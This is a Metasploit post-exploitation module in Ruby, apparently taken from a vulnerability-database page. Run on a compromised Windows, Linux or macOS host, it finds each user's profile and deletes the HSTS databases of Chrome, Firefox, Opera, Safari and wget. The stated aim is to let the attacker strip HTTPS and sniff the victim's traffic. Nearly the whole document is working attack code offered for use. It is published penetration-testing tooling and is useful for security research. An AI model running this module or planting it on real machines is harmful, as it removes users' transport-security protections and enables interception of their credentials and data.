##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Windows::UserProfiles
include Msf::Post::OSX::System
include Msf::Post::Unix
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Web browsers HSTS entries eraser',
'Description' => %q{
This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox,
Google Chrome, Opera, Safari and wget.
},
'License' => MSF_LICENSE,
'Author' => [
'Sheila A. Berta (UnaPibaGeek)', # ElevenPaths
],
'Platform' => %w[linux osx unix win],
'Arch' => [ARCH_X86, ARCH_X64],
'References' => [
[ 'URL', 'http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html' ],
[ 'URL', 'https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf' ]
],
'SessionTypes' => %w[meterpreter shell]
)
)
register_options([
OptBool.new('DISCLAIMER',
[true, 'This module will delete HSTS data from the target. Set this parameter to True in order to accept this warning.', false])
])
end
def run
unless (datastore['DISCLAIMER'] == true)
print_error('This module will delete HSTS data from all browsers on the target. You must set the DISCLAIMER option to True to acknowledge that you understand this warning.')
return
end
profiles = user_profiles
profiles.each do |user_profile|
account = user_profile['UserName']
browsers_hsts_db_path = {}
case session.platform
when 'windows'
browsers_hsts_db_path = {
'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\TransportSecurity",
'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles", # Just path for now
'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\TransportSecurity"
}
when 'unix', 'linux'
browsers_hsts_db_path = {
'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/TransportSecurity",
'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", # Just path for now
'Opera' => "#{user_profile['LocalAppData']}/.config/opera/TransportSecurity",
'wget' => "#{user_profile['LocalAppData']}/.wget-hsts"
}
when 'osx'
browsers_hsts_db_path = {
'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/TransportSecurity",
'Firefox' => "#{user_profile['LocalAppData']}/Firefox/Profiles", # Just path for now
'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/TransportSecurity",
'Safari' => "#{user_profile['AppData']}/Cookies/HSTS.plist"
}
else
print_error "Platform not recognized: #{session.platform}"
end
browsers_hsts_db_path.each_pair do |browser, path|
if browser == 'Firefox'
hsts_db_path = []
if directory?(path)
files = dir(path)
files.reject! { |file| %w[. ..].include?(file) }
files.each do |file_path|
hsts_db_path.push([path, file_path, 'SiteSecurityServiceState.txt'].join(system_separator)) if file_path.match(/.*\.default/)
end
end
path = hsts_db_path[0]
end
if !path.nil? && file?(path)
print_status "Removing #{browser} HSTS database for #{account}... "
file_rm(path)
end
end
end
print_status 'HSTS databases removed! Now enjoy your favorite sniffer! ;-)'
end
def user_profiles
user_profiles = []
case session.platform
when /unix|linux/
user_names = dir('/home')
user_names.reject! { |u| %w[. ..].include?(u) }
user_names.each do |user_name|
user_profiles.push('UserName' => user_name, 'LocalAppData' => "/home/#{user_name}")
end
when /osx/
user_names = session.shell_command('ls /Users').split
user_names.reject! { |u| u == 'Shared' }
user_names.each do |user_name|
user_profiles.push(
'UserName' => user_name,
'AppData' => "/Users/#{user_name}/Library",
'LocalAppData' => "/Users/#{user_name}/Library/Application Support"
)
end
when /windows/
user_profiles |= grab_user_profiles
else
print_error 'Error getting user profile data!'
end
user_profiles
end
def system_separator
return session.platform == 'windows' ? '\\' : '/'
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation